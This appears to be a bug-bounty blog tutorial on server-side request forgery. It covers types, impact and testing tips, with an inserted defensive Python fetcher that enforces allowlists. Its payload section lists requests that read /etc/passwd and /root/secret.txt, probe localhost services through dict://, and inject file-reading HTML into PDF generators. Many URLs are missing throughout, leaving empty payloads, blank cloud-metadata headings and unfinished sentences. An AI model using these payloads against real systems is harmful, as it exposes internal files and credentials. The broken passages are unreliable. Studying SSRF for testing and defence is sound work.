Server-Side Request Forgery, SSRF

Server-Side Request Forgery, SSRF for short, is a vulnerability class in which a server makes a request whose destination is under the attacker's control. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, to other web-based services within the organisation's infrastructure, or to external third-party systems.

What are the types of SSRF?

· Blind SSRF — occurs when you never get any information about the target service back from the initial request

· Semi-blind SSRF

· Non-blind SSRF

What is the impact of SSRF attacks?

A successful SSRF attack can often result in:

· Unauthorised actions or access to data within the organisation, either in the vulnerable application itself or on other back-end systems that the application can communicate with.

· Scanning local or external networks.

· Reading files from the server and internal resources.

· SSRF escalated to reflected XSS.

· Fetching the cloud metadata of the servers.

Preventing Server Side Request Forgery (SSRF)

To prevent SSRF vulnerabilities in web applications it is strongly advised to use a whitelist of allowed domains and protocols from which the web server may fetch remote resources.

When should you test for SSRF?

1. If you find an open redirect, try escalating it to SSRF.

2. Grep for parameters that may be vulnerable to SSRF.

3. SSRF is more common in APIs, so crawl the whole web app with the Burp proxy turned on and search for keywords such as ?url=, ?uri=, ?req=.

4. Sign up with a specially crafted email address. If you receive an HTTP request in Collaborator, it's SSRF. But if there's no impact, don't report it; DNS and SMTP requests don't matter.

5. Try to find blind SSRF in hidden parameters.

6. Try blind SSRF in the Referer header.

How can we perform an SSRF attack against a target application?

Some of the payloads for SSRF

URL-based bypasses: \\@

Bypassing using a redirect

1. Create a page on a whitelisted host that redirects requests to the SSRF target URL (e.g.

2. Launch the SSRF pointing at that page: the server will fetch YOUR_SERVER_IP, which will then redirect it to the SSRF target.
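The whitelist advice from the prevention section and the redirect bypass described in the two steps above are two sides of the same control, so here is one added example covering both (this is editor-written Python, not code from the original post): a fetcher that enforces scheme and host allowlists, refuses URLs carrying userinfo (the `user@host` trick), checks every address an allowlisted name resolves to against loopback, private and link-local ranges, and, instead of letting the HTTP library follow redirects, re-validates each hop against the same policy. The allowlisted hostnames, the addresses in DEMO_DNS and the responses in DEMO_SITE are constructed stand-ins so the example runs offline; `http_fetch` is the real, standard-library-only request path.

```python
import ipaddress
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

# Constructed policy for this example: the only origins the server may fetch from.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}
REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 3


class UnsafeURL(ValueError):
    """Raised when a URL (or a redirect hop) fails the outbound-request policy."""


def resolve_addresses(host):
    """Resolve a hostname to the set of IP address strings it points at."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(text):
    """True only for globally routable addresses; loopback, RFC 1918, link-local (where
    cloud metadata services sit), multicast and reserved ranges are rejected."""
    ip = ipaddress.ip_address(text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # unwrap ::ffff:127.0.0.1 before classifying
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_outbound_url(url, resolver=resolve_addresses):
    """Return the URL if it passes policy, otherwise raise UnsafeURL."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {scheme!r}")
    # In user:pass@host the real host comes after the '@'; refuse userinfo outright.
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("userinfo in URL is not allowed")
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        raise UnsafeURL(f"host not on allowlist: {host!r}")
    addresses = resolver(host)
    if not addresses:
        raise UnsafeURL(f"{host!r} did not resolve")
    for addr in addresses:  # an allowlisted name may still point inward
        if not is_public_address(addr):
            raise UnsafeURL(f"{host!r} resolves to non-public address {addr}")
    return parts.geturl()


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib following redirects; every hop is re-validated by us instead."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url):
    """One HTTP request with redirects disabled. Returns (status, location, body)."""
    opener = urllib.request.build_opener(_NoRedirect)
    request = urllib.request.Request(url, headers={"User-Agent": "safe-fetcher/1.0"})
    try:
        with opener.open(request, timeout=5) as response:
            return response.status, None, response.read()
    except urllib.error.HTTPError as err:  # 3xx lands here because of _NoRedirect
        return err.code, err.headers.get("Location"), err.read()


def fetch_with_revalidation(url, fetch=http_fetch, resolver=resolve_addresses):
    """Fetch url, applying the full policy to every redirect hop.
    Returns (status, body, list_of_validated_hops)."""
    hops = []
    for _ in range(MAX_REDIRECTS + 1):
        safe_url = validate_outbound_url(url, resolver)
        hops.append(safe_url)
        status, location, body = fetch(safe_url)
        if status in REDIRECT_CODES and location:
            url = urljoin(safe_url, location)  # Location may be relative
            continue
        return status, body, hops
    raise UnsafeURL(f"more than {MAX_REDIRECTS} redirects")


# Constructed DNS and web stand-ins so the example runs offline.
DEMO_DNS = {"images.example.com": {"198.100.50.7"}, "cdn.example.com": {"198.100.50.8"}}
DEMO_SITE = {  # url -> (status, Location header, body)
    "http://images.example.com/moved": (301, "https://cdn.example.com/photo.jpg", b""),
    "https://cdn.example.com/photo.jpg": (200, None, b"\xff\xd8JPEG"),
    # the redirect bypass from the text: an allowlisted host bouncing to the metadata address
    "http://images.example.com/bounce": (302, "http://169.254.169.254/", b""),
}
demo_resolver = lambda host: DEMO_DNS.get(host, set())
demo_fetch = lambda url: DEMO_SITE.get(url, (404, None, b"not found"))

if __name__ == "__main__":
    for candidate in ("http://images.example.com/moved", "http://images.example.com/bounce",
                      "file:///etc/passwd", "http://images.example.com@127.0.0.1/"):
        try:
            status, body, hops = fetch_with_revalidation(candidate, demo_fetch, demo_resolver)
            print(f"ALLOW {candidate}: {status} after {len(hops)} hop(s)")
        except UnsafeURL as err:
            print(f"DENY  {candidate}: {err}")
```

The host allowlist is the primary control; the address check behind it is defence in depth for the case where an allowlisted name is later pointed at an internal address. One gap remains by design of this sketch: the validator resolves the name and then the HTTP library resolves it again when connecting, so a DNS answer that changes between the two lookups (rebinding) is not caught. Closing that requires connecting to the address you validated and sending the Host header yourself, or resolving once and pinning the result in the transport.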

Bypassing using type=url

Change "type=file" to "type=url".

Paste the URL into the text field and hit enter.

Using this vulnerability, users can upload images from any image URL, which triggers an SSRF.

SSRF exploiting PDF generation

<link rel=attachment href="file:///root/secret.txt">

The content of the file will be embedded in the PDF as an image or text.

<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

It will give something like:

RESPONSE: <html><head><title>Internal admin panel</title></head>…</html>

SSRF from Referer

User-Agent: Firefox
SSRF from File-upload — redirect test for various cases

Status codes: 300, 301, 302, 303, 305, 307, 308

Filetypes: jpg, json, csv, xml, pdf

JPG 301 response without and with a valid response body:

JSON 301 response without and with a valid response body:

CSV 301 response without and with a valid response body:

XML 301 response without and with a valid response body:

PDF 301 response without and with a valid response body:


1. AWS localhost is so don’t use there!

2. If you find any SSRF vulnerability in an application running on EC2, try requesting:

SSRF URL for Oracle Cloud

SSRF URL for Alibaba

A few more random payloads that might be helpful in finding SSRF vulnerabilities.

Use the payloads below in the request:

GET /?url= HTTP/1.1

GET /?url=http://localhost/server-status HTTP/1.1

GET /?url= HTTP/1.1

GET /?url=dict://localhost:11211/stat

GET /?url=file:///etc/passwd

Keywords to try: file:///, dict://, ftp://, gopher://

{"userId": "1", "url": "http://127.0.1:513/"}

{"userId": "1", "url": ""}

Some of the tools that can be used for SSRF

· SSRFmap —

· Gopherus —

· See-SURF —

· SSRF Sheriff —

Akash Venky